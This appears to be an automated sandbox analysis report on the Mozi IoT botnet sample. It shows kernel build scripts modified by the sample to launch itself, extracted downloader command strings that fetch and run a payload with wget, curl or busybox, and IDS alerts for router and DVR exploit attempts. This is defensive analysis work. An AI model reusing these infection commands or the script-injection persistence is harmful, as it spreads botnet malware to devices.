CONSOLE ]; then...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB$devno c $fsmaj $min >> $SCR...fi..else...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TTY$d

/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	19777
Entropy (8bit):	5.576952905096142
Encrypted:	false
SSDEEP:	384:fwMxiQBla8sAxIEVcwZ+ZoBaOOatUdpVnismIm4FOtcra5rdr/QB5oAl6MQBX6hy:fwMxra8HxIEkmImIOtcra5rAoAl636hy
MD5:	3CF3EA10A24E6A5799372E52C625F5FF
SHA1:	8DCE2DD4D30FE29A3CD9B06E8C276CFAEB41B191
SHA-256:	FD1FB0A9D12E75013B3C330D081C6817E5C0090DE03C22A96B14674A168B307F
SHA-512:	D0108C351A191121A5DB5777A451261837126CC955FFADCF0855C82F27CCF794B91FED77DE152AD61907595A30E879EA582E9819CCAEAC0BDCCAF82C07CC59CE
Malicious:	false
Preview:	./usr/networks&. exit 1.fi.# ============= MultiSound.d/setdigital.c ==============.if test ! -d 'MultiSound.d'; then. $echo 'x -' 'creating directory' 'MultiSound.d'. mkdir 'MultiSound.d'.fi.if test -f 'MultiSound.d/setdigital.c' && test "$first_param" != -c; then. $echo 'x -' SKIPPING 'MultiSound.d/setdigital.c' '(file already exists)'.else. $echo 'x -' extracting 'MultiSound.d/setdigital.c' '(text)'. sed 's/^X//' << 'SHAR_EOF' > 'MultiSound.d/setdigital.c' &&./********************************************************************.X .X * setdigital.c - sets the DIGITAL1 input for a mixer.X .X Copyright (C) 1998 Andrew Veliath.X .X This program is free software; you can redistribute it and/or modify.X * it under the terms of the GNU General Public License as published by.X * the Free Software Foundation; either version 2 of the License, or.X * (at your option) any later version..X .X This program is distributed in the hope that it will be useful,.X * but WITHOUT ANY WAR

/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.264867233271885
Encrypted:	false
SSDEEP:	24:NcdhLFmJJsA1Mz9mOBM1t1IjQ+51MC1JOgULmjXUkSo0:NYs51gXe1i95JJB8mH0
MD5:	946D056056885AB81686DFF084F8C0AC
SHA1:	6087B2C2445E11CDE4F03C2E71A445978D68C166
SHA-256:	CF5DEAF653121D3BAE355DBBF73837ABDB5AD46871BCE09376D1EAE23DBAC41A
SHA-512:	D91BE0DF8EB1A761C0BA21D6D563C90D1AB7A740CDCB1A71D611D3C8F6C48D4D6C6291E77B407E51AE9D8D264726806E82CDE5FF00068E0A0487598656365489
Malicious:	false
Preview:	./usr/networks&..[ "$val" ] \|\| { echo "can't find $1 in $VMLINUX" 1>&2; exit 1; }..# convert from hex to decimal..echo $((0x$val)).}..__data_loc=$(sym_val __data_loc)._edata_loc=$(sym_val _edata_loc).base_offset=$(sym_val _xiprom)..# convert to file based offsets.data_start=$(($__data_loc - $base_offset)).data_end=$(($_edata_loc - $base_offset))..# Make sure data occupies the last part of the file..file_end=$(${CONFIG_SHELL} "${srctree}/scripts/file-size.sh" "$XIPIMAGE").if [ "$file_end" != "$data_end" ]; then..printf "end of xipImage doesn't match with _edata_loc (%#x vs %#x)\n" \.. $(($file_end + $base_offset)) $_edata_loc 1>&2..exit 1;.fi..# be ready to clean up.trap 'rm -f "$XIPIMAGE.tmp"; exit 1' 1 2 3..# substitute the data section by a compressed version.$DD if="$XIPIMAGE" count=$data_start iflag=count_bytes of="$XIPIMAGE.tmp".$DD if="$XIPIMAGE" skip=$data_start iflag=skip_bytes \|.$KGZIP -9 >> "$XIPIMAGE.tmp"..# replace kernel binary.mv -f "$XIPIMAGE.tmp" "$XIPIMAGE"../us

/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	5.14795580060536
Encrypted:	false
SSDEEP:	12:cngowa2h12l3mGXHFMyHFtfBkcCZsL49ysL7FwuIGCjDCLn:M4+XKyrZRCZsL4QsL7FwuIzvCL
MD5:	DD8FCA0CC462A93575815302D5C70995
SHA1:	FFE07B0595BA0DAA3799B71E79F3648D02B641D3
SHA-256:	FC1B0AA6D39705668CA297DACF643A6D429E42A84DABDE0601734F864DBE364F
SHA-512:	D28E0773CFD7FA867E627785D1D86A8AC74A92FB5CB6CC47E642B1E41EB0DCB015D4186D87962A63BF51E22B2EF7FE237C1BCA9B04D557E2C48755D6EF319658
Malicious:	false
Preview:	./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1..if [ -x /sbin/loadmap ]; then. /sbin/loadmap.else. echo "You have to install it yourself".fi../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.90905274301989
Encrypted:	false
SSDEEP:	3:qXVxpjUvwcG6IYlfkoeOPeQxS8LXEVvXFNK/5e9o4TLZFwqwXF6HF/qHF7VvMTc2:apovwTMldPzMvHK/5u3rHoHjUAEPTn
MD5:	543D5DBC6E85559159F104129FF1BF1F
SHA1:	324751DF3B652BC8C71B68222D94E6A74C27B1B1
SHA-256:	97ABE3A808380B11D216A3484E4156BFA5336031DD00A76307C2987585FBFF77
SHA-512:	880C67C68ED1AB3436653F636294C1FCD3F70EE82C66529E99D95D1428902417FD2053093CE5D047088AE26B45822D39BFDC9AFFC9CC14FBC61C81DFBA96E59A
Malicious:	false
Preview:	./usr/networks&. exit 1. fi...if [ -n "$entry" ]; then. if [ -z "$compat" ]; then. echo "NATIVE($nr, $entry)". else. echo "COMPAT($nr, $entry, $compat)". fi. fi. done.) > "$out"../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	716
Entropy (8bit):	5.188740504939567
Encrypted:	false
SSDEEP:	12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
MD5:	E233F7425841D915F481DD78C9518D4D
SHA1:	68CF549CF969E9786FF3BCECA2C5976C678C2358
SHA-256:	FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
SHA-512:	4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
Malicious:	false
Preview:	./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.

Source: Mozi.m.3	Virustotal: Detection: 65%	Perma Link
Source: Mozi.m.3	Metadefender: Detection: 68%	Perma Link
Source: Mozi.m.3	ReversingLabs: Detection: 75%

Source: /tmp/Mozi.m.3 (PID: 5234)	Opens: /proc/net/route
Source: /tmp/Mozi.m.3 (PID: 5234)	Opens: /proc/net/route

Source: Mozi.m.3	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m.3	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m.3	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.12.dr	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.11.243.9:80 -> 192.168.2.23:50306
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54856 -> 81.108.37.251:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.122.127:80 -> 192.168.2.23:55982
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.57.42.173:80 -> 192.168.2.23:54054
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58926 -> 34.120.140.43:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.174.45:80 -> 192.168.2.23:47780
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 152.89.62.52:30301 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.193.239:8000 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 174.84.184.69:11211 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 109.164.113.203:5060 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.178.190:80 -> 192.168.2.23:41594
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 61.3.148.76:18606 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.93.89:1900 -> 192.168.2.23:4000
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34362 -> 148.229.1.12:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.58.36.209:80 -> 192.168.2.23:39960
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:35686 -> 67.87.4.136:81
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.123.60:80 -> 192.168.2.23:33508
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:36280 -> 1.9.218.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.16.109:80 -> 192.168.2.23:35956
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.48.195:80 -> 192.168.2.23:57410
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 60.254.146.28:80 -> 192.168.2.23:59316
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:46538 -> 192.126.238.185:80
